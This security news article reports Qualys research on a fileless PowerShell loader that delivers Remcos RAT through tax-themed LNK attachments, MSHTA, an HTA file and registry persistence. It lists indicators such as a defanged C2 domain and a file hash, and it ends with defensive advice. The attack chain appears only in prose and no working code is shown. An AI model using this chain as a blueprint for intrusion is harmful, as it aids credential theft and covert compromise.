Cybersecurity experts have identified a concerning trend in the malware landscape as threat actors increasingly leverage fileless techniques to circumvent traditional security measures.
A sophisticated PowerShell-based shellcode loader executing Remcos Remote Access Trojan (RAT) has emerged as the latest example of this evolution, demonstrating how attackers are adapting their methods to remain undetected in compromised systems.
The attack begins with seemingly innocuous ZIP archives containing weaponized LNK files that, once executed, trigger a chain of events designed to leave minimal forensic evidence.
.png
)
These files exploit proxy execution through trusted system binaries to establish persistence while operating almost entirely within memory, effectively bypassing signature-based detection mechanisms that rely on file scanning.
Qualys researchers identified this threat during routine threat hunting operations, noting its remarkable ability to evade traditional endpoint protection platforms.
“This malware exemplifies the growing sophistication of fileless attacks,” explained Prashant Pawar, Lead Threat Research Engineer at Qualys.
“By executing malicious code directly in memory and leveraging trusted Windows components, it remains virtually invisible to conventional security tools.”
The impact of such attacks extends beyond immediate system compromise. Once established, Remcos RAT provides attackers with extensive capabilities including screen capture, keylogging, credential theft from web browsers, and automated data exfiltration.
.webp)
Its stealthy nature means infections can persist for extended periods, giving threat actors ample time to accomplish their objectives while defenders remain unaware of the breach.
The primary infection vector involves malicious email attachments disguised as tax documents.
When opened, these trigger a sophisticated execution chain that ultimately loads the Remcos RAT directly into memory without writing the malicious payload to disk.
.webp)
The initial LNK file was detected and removed by Qualys EPP, preventing the infection from establishing a foothold.
Detection Evasion Techniques
The shellcode loader employs several advanced techniques to avoid detection. At its core, the attack leverages PowerShell’s ability to execute code directly in memory, bypassing file-based scanning engines.
The malware authors have implemented multiple layers of obfuscation within their PowerShell scripts, including encrypted strings, dynamic API resolution, and binary padding to confuse automated analysis tools.
The attack chain begins when users interact with malicious LNK files that execute MSHTA with specifically crafted command arguments.
This triggers the download and execution of an HTA file (identified as xlab22.hta with hash 1b26f7e369e39312e4fcbc993d483b17) from command and control servers including mytaxclientcopy[.]com.
The HTA file subsequently launches PowerShell to execute the final payload.
.webp)
The process tree captured by Qualys EDR shows the parent-child process relationships that characterize this attack.
The visualization reveals how legitimate Windows processes are hijacked to execute malicious code, creating a complex chain that makes attribution and detection challenging for security teams.
The malware establishes persistence by modifying registry run keys, ensuring it survives system reboots without creating suspicious files on disk.
It also employs User Account Control bypass techniques to elevate privileges, allowing it to perform sensitive operations without triggering security alerts.
Security professionals are advised to implement comprehensive PowerShell logging, enable Antimalware Scan Interface (AMSI) monitoring, and deploy robust EDR solutions capable of detecting behavioral anomalies rather than relying solely on file signatures.
Early detection remains critical in preventing these sophisticated threats from establishing a persistent foothold in enterprise environments.
How SOC Teams Save Time and Effort with ANY.RUN - Live webinar for SOC teams and managers
